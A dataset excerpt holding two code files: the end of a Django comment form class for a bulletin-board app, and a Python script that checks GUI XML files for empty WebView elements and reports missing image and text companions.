CommentAddForm(forms.ModelForm):\n    class Meta:\n        model = Comment\n        fields = (\"text\", \"author\", \"post\")\n\n    def __init__(self, *args, **kwargs):\n        super(CommentAddForm, self).__init__(*args, **kwargs)\n        self.fields['text'].label = 'New comment'\n","repo_name":"gim7y/mod13.7","sub_path":"project/bboard/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33012348598","text":"#!/usr/bin/env python3\n\nimport glob\nimport re\nimport os\n\nempty_re = re.compile(\"WebView[^/>]+/>\")\nfor filename in glob.glob(\"../guis/*.xml\"):\n    with open(filename) as f:\n        if empty_re.search(f.read()):\n            print(\"Empty WebView in %s !!\" % filename)\n            os.rename(filename, filename + \".err\")\n    imgname = filename.replace('xml', 'png')\n    if not os.path.exists(imgname):\n        print(\"missing %s\" % imgname)\n    actname = filename.replace('xml', 'txt')\n    if not os.path.exists(actname):\n        print(\"missing %s\" % actname)\n#        if actname.count('_') == 1:\n#            for i in range(5):\n#                ret = os.system(\"cp %s %s\" % (actname.replace(\"_\", \"_%d_\" % i), actname))\n#                if ret == 0:\n#                    break;\n","repo_name":"columbia/appflow","sub_path":"src/chk.py","file_name":"chk.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"60"}